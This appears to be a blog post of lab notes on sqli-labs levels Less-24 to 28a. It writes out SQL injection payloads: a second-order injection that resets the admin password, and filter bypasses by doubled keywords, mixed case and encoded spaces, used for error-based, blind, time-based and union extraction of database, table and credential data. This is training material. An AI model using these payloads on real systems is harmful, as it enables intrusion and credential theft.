sqli-labs靶场笔记(五)

最新推荐文章于 2025-03-20 16:23:13 发布
原创 最新推荐文章于 2025-03-20 16:23:13 发布 · 262 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文是sqli-labs靶场笔记第五篇,记录了Less-24至Less-28a多个关卡的SQL注入情况。如Less-24在更改密码页面注入成功;Less-25等关卡存在不同过滤规则,需采用双写绕过、大小写绕过、编码绕过等方法,还涉及时间盲注、联合注入等技术。

sqli-labs靶场笔记(五)

Less-24【二次注入|'注入】

在这里插入图片描述

代码分析

在这里插入图片描述
注册页面存在过滤,无法注入
在这里插入图片描述
更改密码页面没有过滤,可以尝试注入

创建账户

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

成功创建账号admin’ #

登陆账号进行修改密码操作

在这里插入图片描述
在这里插入图片描述
注入成功,成功修改admin密码

Less-25【双写绕过|'注入|注释符屏蔽|报错注入】

该题过滤了and、or、注释符
下面展示 payload

id=1' aandnd extractvalue(1,concat('~',(select database()))) anandd 'a'='a

在这里插入图片描述
在这里插入图片描述

Less-25a【双写过滤|Boolean盲注】

下面展示 payload

id=1 aandnd ascii(substr((select database()),1,1))=115

在这里插入图片描述
在这里插入图片描述
得到数据库为security

Less-26【双写绕过|'注入|注释符屏蔽|报错注入|空格屏蔽】

该题过滤了and、or、空格和注释符

法一:

这里的可以使用||或者采用()绕过
下面展示 payload

1’+aandnd+'a'='a
1'||extractvalue(1,concat('~',(select database())))||'a'='a	//爆破数据库名
1'||extractvalue(1,concat('$',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))))||'a'='a	//爆破表名

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

法二:

在linux下执行:
下面展示 payload

id=0'%a0union%a0select%a0 1,2,
(select%a0 group_concat( concat_ws( 0x7e,username,passwoorrd )) %a0from (%a0security.users)) ;%00

%a 相当于空格 转码问题
在这里插入图片描述

Less-26a【编码绕过|’)注入|注释符屏蔽|空格屏蔽】

这题无法使用报错注入、盲注,且在windows上转码存在一定问题,以下去到linux环境下进行。
该题过滤了and、or、空格和注释符

下面展示 payload

id=0'%a0)union%a0select%a0 1,2,
(select%a0 group_concat( concat_ws( 0x7e,username,passwoorrd )) %a0from (%a0security.users)) ;%00

在这里插入图片描述

Less-27【大小写绕过|'注入|编码绕过|注释符屏蔽|空格屏蔽】

该题屏蔽了空格,注释符,select,union
下面展示 payload

id=0'%a0)UniOn%a0SeLect%a0 1,2,
(sEleCt%a0 group_concat( concat_ws( 0x7e,username,passwoorrd )) %a0from (%a0security.users)) ;%00

在这里插入图片描述

Less-27a【大小写绕过|"注入|编码绕过|注释符屏蔽|空格屏蔽】

该题屏蔽了空格,注释符,select,union
下面展示 payload

id=0“%a0UniOn%a0SeLect%a0 1,2,
(sEleCt%a0 group_concat( concat_ws( 0x7e,username,passwoorrd )) %a0from (%a0security.users)) ;%00

在这里插入图片描述

Less-28【时间盲注|空格屏蔽】

该题屏蔽了union、select关键字

下面展示 payload

1%27)and%a0if(ascii(substr((select%a0database()),1,1))=115,sleep(5),1);%00	//时间盲注爆破库名
1%27)and%a0if(ascii(substr((select%a0table_name%a0from%a0information_schema.tables%a0where%a0table_schema=%27security%27%a0limit%a00,1),1,1))=101,sleep(5),1);%00	//时间盲注爆破表名

在这里插入图片描述

在这里插入图片描述

Less-28a【union联合注入|时间盲注】

该题屏蔽了union、select关键字

法一:时间盲注【linux上进行】

下面展示 payload

1%27)and%a0if(ascii(substr((select%a0database()),1,1))=115,sleep(5),1);%00	//时间盲注爆破库名
1%27)and%a0if(ascii(substr((select%a0table_name%a0from%a0information_schema.tables%a0where%a0table_schema=%27security%27%a0limit%a00,1),1,1))=101,sleep(5),1);%00	//时间盲注爆破表名

法二:union联合注入【win系统】

下面展示 payload

-1') uniounion selectn select 1,database(),3%23	//爆破库名
-1') uniounion selectn select 1,(select table_name from information_schema.tables where table_schema='security' limit 3,1),3%23	//爆破表名
id=0') uniounion selectn select 1,2,
(select group_concat( concat_ws( 0x7e,username,password)) from security.users)--+	//爆破数据

在这里插入图片描述
在这里插入图片描述

SQL-libs Less-5
AgonYAN的博客
06-29 318
SQL-libs Less-5
SQLi-Labs靶场通关笔记(1~21关)
trdtyvu的博客
07-06 3430
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个关卡,其中关卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择关卡
sqli-labs靶场笔记
qq_33441500的博客
10-20 322
less-1 单引号的显错注入 关键代码段 直接输入单引号让其报错 由代码我们可以看出数据库查询语句只是对id传参进行了...
sql-libs(5)
weixin_30352191的博客
08-13 265
直接只用floor报错注入 或者 update即可 转载于:https://www.cnblogs.com/kuaile1314/p/11345399.html
SQLI-LABS 靶场通关小记(1~22)
曹振国的博客
07-14 4178
1~22Less-1:1.查询字段数2.查询输出点3.查询库名4.查询表名5.查询字段名6.查询数据Less-2:1.查询输出点Less-3:1.查询输出点Less-4:1.查询输出点Less -5:1.使用left()函数进行截取测试2.使用length判断长度3.利用ascii码猜测数据库名4.使用二分法进行盲注查表名Less-6:1.使用length判断长度Less-7:1.查看源码2.入一句话木马连接蚁剑Less-8:1.使用length判断长度Less-9:1.使用sleep()函数进行时间盲注
精选资源
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs学习笔记
最新发布
2301_81574836的博客
03-20 656
sqli-labs学习笔记1
Sqli-labs靶场搭建(适合新手小白围观)
热门推荐
记录开发和安全学习过程中的点点滴滴
09-12 1万+
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
sqli-labs靶场(1-20)通关手册
m0_58168821的博客
07-03 1183
id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,32)),1) --+ --------爆出字段名。发现报错如上图,此时我们判断出,闭合方式中含有单引号,我们假设只有单引号,加上or 1=1 --+
Sqli-labs 靶场通关学习记录
eyyer的博客
02-13 1847
Sqli-labs 靶场通关学习记录
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 9617
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
sqli-libs 1-5
鲨鱼辣椒的博客
05-19 773
目录 sqlmap 判断是否有注入点 获取数据库名 获取数据库中的表名 获取表中的列名 获取列中的字段 sqlmap 判断是否有注入点 sqlmap.py -u http://127.0.0.1/sqli/sqli-labs-master/Less-1/?id=1 看报错可知,首先是GET请求,然后有四种注入类型依次分别是布尔型盲注、报错注入、时间型盲注、和联合注入 获取数据库名 sqlmap.py -u http://127.0.0.1/sqli/sqli-labs.
sqli-libs入门攻略(5)
shijianyoulei6的博客
06-30 389
Less-05 单引号 注入 注入查询需要理解四个函数/语句 Rand() 随机函数 Floor() 取整函数 Count() 汇总,聚合函数 Group by clause 分组语句 简单地说也就是在一个聚合函数里,如果count函数后面有分组语句,就会把查询的一部分以报错的形式显示出来。 爆库名 http://192.168...
sqli-labs靶场1-12关通关记录
SEV__en的博客
07-25 1858
攻击者通过注入SQL语句片段导致后端执行预期外的SQL查询。
SQLI-labs 通关笔记靶场安装
fyrmaryt的博客
02-27 792
SQLI-labs通关笔记之安装及介绍篇。
sql-lib 1-10关
鸣蜩十四的博客
06-14 850
1. 字符型 http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败 http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功 http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库 ht...
sqlilabs靶场1—20题学习笔记(思路+解析+方法)
2301_79355407的博客
04-16 3426
此文章为初学者在学习SQL注入使用sqlilabs靶场的学习笔记,均为手工注入,未使用sqlmap。有很多出错以及不懂的地方。此文章会不断补充和更正。
sqli-labs靶场笔记(一)
Vi_vids的博客
12-06 306
sqli-labs靶场笔记(一) Less-01 下面展示一些 会用到的payload。 id=-1' union select 1,user(),database() --+ id=-1' or exist(select * from information_schema_columns) --+ id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='secur
靶场sqli-labs的练习笔记(基础知识)第一章
m0_55314368的博客
06-13 339
在获得了数据库名称之后我们来查询表名,表名又有很多种,刚才爆出了emails、referers,uagents,user这些表名,通常我们需要拿到一些敏感数据的时候,我们首先会对user表中的数据感兴趣,先进入user中查看。加入联合语句,查看没有变换,那么已知id=1是正确的,所有后面才有可能不显示,尝试修改让前面的信息报错id=-1,并且判断闭合方式为id=1'这段语句的作用是查询table_schma=当前数据库名称的,刚才根据SQL注入点报错,我们可以得到database()=security。
支持PHP7的sqli-labs靶场介绍
3. sqli-labs靶场sqli-labs是一个非常流行的在线学习平台,它提供了一个模拟的环境,其中包含了多个练习关卡,每个关卡都有一个或多个SQL注入漏洞等待用户发现和利用。通过逐个解决这些关卡,学习者可以掌握SQL...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值